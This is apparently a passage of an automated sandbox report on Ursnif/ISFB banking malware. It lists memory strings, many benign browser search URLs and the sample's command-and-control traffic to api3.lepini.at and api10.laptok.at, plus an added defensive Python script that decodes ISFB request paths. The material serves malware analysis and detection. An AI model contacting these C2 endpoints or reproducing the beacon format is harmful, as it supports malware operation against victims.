Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp | String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp | String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 3653 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp | String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365g equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.msn.com
Source: unknown | HTTP traffic detected: POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 15 Feb 2021 20:26:44 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: not printable (a single 0x6a-byte chunk holding a gzip member, magic 1f 8b 08, followed by the zero-length terminating chunk)
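Three things an analyst would do with the request and response lines above: pick out the fetches that carry no User-Agent at all (the report's "HTTP GET or POST without a user agent" signature; here the t64.dat requests to c56.lepini.at), normalise the long pseudo-random /api1/ paths, and recover the body of the 404 the C2 front end returned. The block below is an added example written for this page, not Joe Sandbox output or anything from the sample; its inputs are constructed from the lines above with header sets abbreviated. The path normalisation relies on documented ISFB/Gozi behaviour that the report itself does not state: the bot base64-encodes its request data, replaces "+" with "_2B" and "/" with "_2F" (percent-encoding with "_" in place of "%") and inserts "/" at random positions; the "_3D" mapping for "=" is this example's own assumption. The payload is encrypted with a key from the bot configuration that the report does not expose, so the token is only normalised, not decrypted.

```python
"""Triage of the HTTP lines in this report (added example, not part of the report).

  1. missing_user_agent(): hosts contacted without any User-Agent header.
  2. isfb_token() / c2_candidates(): undo ISFB's path encoding ('_2B' -> '+', '_2F' -> '/',
     random '/' inserted; the '_3D' -> '=' mapping is assumed) to expose the base64 token.
  3. dechunk() / decode_404_body(): rebuild the chunked, gzip-compressed 404 body from
     the 'Data Raw' bytes of the nginx response.
"""
import gzip
import re
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    host: str
    path: str
    headers: dict = field(default_factory=dict)


IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
FF85_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"

REQUESTS = [  # constructed from the report's "HTTP traffic detected" lines; headers abbreviated
    Request("GET", "c56.lepini.at", "/jvassets/xI/t64.dat",
            {"Cache-Control": "no-cache", "Connection": "Keep-Alive", "Pragma": "no-cache"}),
    Request("GET", "api10.laptok.at",
            "/api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/"
            "lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/"
            "DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/"
            "TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F",
            {"User-Agent": IE11_UA, "Accept-Encoding": "gzip, deflate"}),
    Request("GET", "api10.laptok.at", "/favicon.ico", {"User-Agent": IE11_UA}),
    Request("POST", "api3.lepini.at",
            "/api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/"
            "FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/"
            "_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/"
            "UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs",
            {"User-Agent": FF85_UA, "Content-Length": "2"}),
]


def missing_user_agent(reqs=REQUESTS):
    """Hosts contacted by at least one request that carries no User-Agent header."""
    return sorted({r.host for r in reqs if not any(k.lower() == "user-agent" for k in r.headers)})


ESCAPES = {"_2B": "+", "_2F": "/", "_3D": "="}   # '_3D' is an assumption, see lead-in


def isfb_token(path):
    """Undo ISFB's path encoding; return the base64 token, or None if the path does not fit.
    Slashes are dropped first because a random '/' may land inside an escape ('..._2/F...')."""
    if not path.startswith("/api1/"):
        return None
    flat = path[len("/api1/"):].replace("/", "")
    for esc, ch in ESCAPES.items():
        flat = flat.replace(esc, ch)
    if len(flat) < 40 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", flat):
        return None   # stray '_' or other characters: not the pattern we are after
    return flat


def c2_candidates(reqs=REQUESTS):
    """(method, host, token length) for every request whose path normalises to an ISFB token."""
    return [(r.method, r.host, len(tok)) for r in reqs if (tok := isfb_token(r.path))]


# 'Data Raw' from the report: chunked transfer encoding wrapping a gzip member.
RAW_404 = bytes.fromhex(
    "36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 "
    "b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 "
    "d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 "
    "0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a")


def dechunk(data):
    """Join an HTTP/1.1 chunked body: hex size, CRLF, data, CRLF, ..., '0', CRLF, CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)   # ignore any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += data[pos:pos + size]
        pos += size + 2                                 # skip the chunk's trailing CRLF


def decode_404_body(raw=RAW_404):
    """The 404 page as the server sent it; gzip.decompress also checks the CRC32/length trailer."""
    return gzip.decompress(dechunk(raw))


if __name__ == "__main__":
    print("no User-Agent:", missing_user_agent())
    for method, host, n in c2_candidates():
        print(f"ISFB-style token: {method} {host} ({n} base64 characters)")
    print(decode_404_body().decode())
```

The decoded body is the stock 146-byte nginx "404 Not Found" page, which is consistent with a C2 front end that only answers paths it recognises; the two /api1/ requests (the GET to api10.laptok.at and the POST to api3.lepini.at) normalise cleanly to base64 tokens, while /favicon.ico and /jvassets/xI/t64.dat do not.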
(Most of the explorer.exe entries below are Internet Explorer search-provider and favicon URLs resident in that process and are not attributable to the sample. The entries that matter are the api10.laptok.at and api3.lepini.at URLs, and the constitution.org/usdeclar.txt and USER.ID%lu.exe/upd strings found in the regsvr32.exe and powershell.exe dumps that the Ursnif Yara rules matched above.)
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm
Source: explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp | String found in binary or memory: http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000019.00000003.444661390.000001BFEACB7000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
